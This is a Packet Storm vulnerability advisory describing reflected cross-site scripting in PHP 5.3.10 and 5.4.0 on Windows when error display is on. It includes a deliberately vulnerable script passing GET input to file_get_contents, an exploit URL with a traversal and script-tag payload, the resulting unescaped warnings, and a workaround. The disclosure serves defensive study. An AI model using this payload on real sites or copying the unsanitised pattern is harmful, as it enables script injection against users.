exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHP 5.3.10 / 5.4.0 Cross Site Scripting

PHP 5.3.10 / 5.4.0 Cross Site Scripting
Posted Apr 9, 2012
Authored by Akastep

PHP versions 5.3.10 and 5.4.0 suffer from a cross site scripting vulnerability when display_errors is set to on and html_errors is set to on.

tags | exploit, php, xss
SHA-256 | 045dd019320c71cb81f5b97a0acf804293d0d1c9b041d0f7f586853578b51c32

PHP 5.3.10 / 5.4.0 Cross Site Scripting

Change Mirror Download
=============================================================================================
Vulnerable Software: PHP 5.3.10/5.4.0

php-5.3.10-Win32-VC9-x86.zip (MD5 SUM: af452dfa681ae03ff42eea6d1c7348cd )
php-5.4.0-Win32-VC9-x86.zip (MD5 SUM: b1b0abe883f84eb6d76793aabf1aa612 )
Downloaded From:windows.php.net
=============================================================================================
Tested:
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
Apache from apachelounge.com: Version: 2.2.22.0
=============================INFO============================================================
PHP 5.3.10
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
PHP Version 5.3.10
Build Date Feb 2 2012 20:26:31
Compiler MSVC9 (Visual C++ 2008)
Architecture x86
Configure Command cscript /nologo configure.js
"--enable-snapshot-build" "--disable-isapi" "--enable-debug-pack" "--disable-isapi" "--without-mssql"
"--without-pdo-mssql" "--without-pi3web" "--with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"
"--with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"
"--enable-object-out-dir=../obj/" "--enable-com-dotnet" "--with-mcrypt=static" "--disable-static-analyze"
==============================================================================================
PHP 5.4.0
OS:Windows NT SRV2003-A1W2LOM 5.2 build 3790 (Windows Server 2003 Enterprise Edition) i586
Build Date Feb 29 2012 19:20:16
Compiler MSVC9 (Visual C++ 2008)
Architecture x86
Configure Command cscript /nologo configure.js "--enable-snapshot-build"
"--disable-isapi" "--enable-debug-pack" "--disable-nsapi" "--without-mssql"
"--without-pdo-mssql" "--without-pi3web" "--with-pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared"
"--with-oci8=C:\php-sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php-sdk\oracle\instantclient11\sdk,shared"
"--enable-object-out-dir=../obj/" "--enable-com-dotnet" "--with-mcrypt=static" "--disable-static-analyze" "--with-pgo"
===============================================================================================


Vuln Desc: Cross Site Scripting Vulnerabilities.
Reason:Misconfiguration in php.ini-* file about:=> html_error <= directive
Also insufficent sanitization when generating warnings which is manipulatable by client side.
Problem in that PHP 5.3.10's php.ini "says":
//Snippet from php.ini-production (This also applies to php.ini-development except display_errors)
---------SNIP STUFF ------------------------
display_errors = off
----- SOME CONFIGURATION SNIP------------
; When PHP displays or logs an error, it has the capability of inserting html
; links to documentation related to that error. This directive controls whether
; those HTML links appear in error messages or not. For performance and security
; reasons, it's recommended you disable this on production servers.
; Note: This directive is hardcoded to Off for the CLI SAPI
; Default Value: On
; Development Value: On
; Production value: Off
; http://php.net/html-errors
html_errors = off
------------EOF SNIP STUFF------------------------

I Agree with: display_errors =off it works as expected but...
Simply enable it: display_errors = off to On state. (display_errors = On)
Restart Apache
And exploitate:
(lets say it is vulnerable script in server In eg:)

cat step2.php
/* BEGIN */
<?php

if(isset($_GET['test']))
{

file_get_contents($_GET['test']);

}


?>
/* = EOF */

Exploit:
http://192.168.0.15/bypass/work/step2.php?test=../../../../../../../../../../../../../../<script>alert(document.location);</script>

From source code of page:(Take a look it doesn't "htmlentitied" by PHP.(Non Persistent Cross Site Scripting Vuln))

Warning: file_get_contents(): Unable to access ../../../../../../../../../../../../../../<script>alert(document.location);</script> in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6

Warning: file_get_contents(../../../../../../../../../../../../../../<script>alert(document.location);</script>): failed to open stream: No such file or directory in C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php on line 6

Print screen:
http://s019.radikal.ru/i634/1204/d8/ec8485e212bc.png


All problem in that: html_errors = off doesn't works as expected.(Am i Confused or ?)

(Note: In PHP Version 5.4.0 php.ini-production html_errors=On (<=In this state it is disabled) (This means it is off default.Because php 5.4.10 too is prone to this.
For testing Change it to Off.It is also vulnerable))

It "thinks" OFF state is ON and versa (OFF is ON)
You can confirm it simply:
change it to On state then restart Apache and try to exploitate like bottom.(It'll not work in this case.)
Here is after changing= > html_errors=On <= state: (Changed to On state)

From source code of page:(Take a look it is "htmlentitied" and safe now.)
<br />
<b>Warning</b>: file_get_contents(../../../../../../../../../../../../../../<script>alert(1);</script>) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: Invalid argument in <b>C:\Program Files\Apache2.2\Apache2\htdocs\bypass\work\step2.php</b> on line <b>6</b><br />


In fact on production servers => display_errors = off (default)<= so this suppress all this stuff.(This will mitigate this issuse.)

Here is my md5 summary's:

me@localhost.localdomain /cygdrive/c/temp/mydirsnap
$ md5sum php-5.3.10-Win32-VC9-x86.zip
af452dfa681ae03ff42eea6d1c7348cd *php-5.3.10-Win32-VC9-x86.zip <= It is from my VirtualBox (same md5 summary)

me@localhost.localdomain /cygdrive/c/temp/mydirsnap
$ md5sum 2/php-5.3.10-Win32-VC9-x86.zip
af452dfa681ae03ff42eea6d1c7348cd *2/php-5.3.10-Win32-VC9-x86.zip <= Just downloaded from windows.php.net (same md5 summary.See bottom)

me@localhost.localdomain /cygdrive/c/temp/mydirsnap
$ ls -liaR
.:
total 15436
44754521297054585 drwxrwxrwt+ 1 Ãîñòü Îòñóòñòâóåò 0 Apr 8 22:57 .
3659174697249195 drwxrwxrwt+ 1 Domain Îòñóòñòâóåò 0 Apr 8 22:57 ..
5629499534273522 drwxrwxrwt+ 1 Ãîñòü Îòñóòñòâóåò 0 Apr 8 23:01 2
3659174697298844 -rwxrwxrwx+ 1 Ãîñòü Îòñóòñòâóåò 15805513 Feb 13 00:37 php-5.3.10-Win32-VC9-x86.zip <= It is from my VirtualBox

./2:
total 15436
5629499534273522 drwxrwxrwt+ 1 Ãîñòü Îòñóòñòâóåò 0 Apr 8 23:01 .
44754521297054585 drwxrwxrwt+ 1 Ãîñòü Îòñóòñòâóåò 0 Apr 8 22:57 ..
26177172834151436 -rwxrwxrwx+ 1 user Îòñóòñòâóåò 15805513 Apr 8 22:12 php-5.3.10-Win32-VC9-x86.zip <= Just downloaded from windows.php.net

me@localhost.localdomain /cygdrive/c/temp/mydirsnap


Note: Not tested under Linux.Tested *Only* under Windows Server 2003 OS.




********************************************** Workaround *******************************************
After playing with html_error=on/off test your server like bottom)
Turn off all Display_erros in your php.ini (Suppress all errors,warnings and do not output
anything to client side)
****************************************************************************************************


/AkaStep ^_^
Greetz to all:
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!
Thank you.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close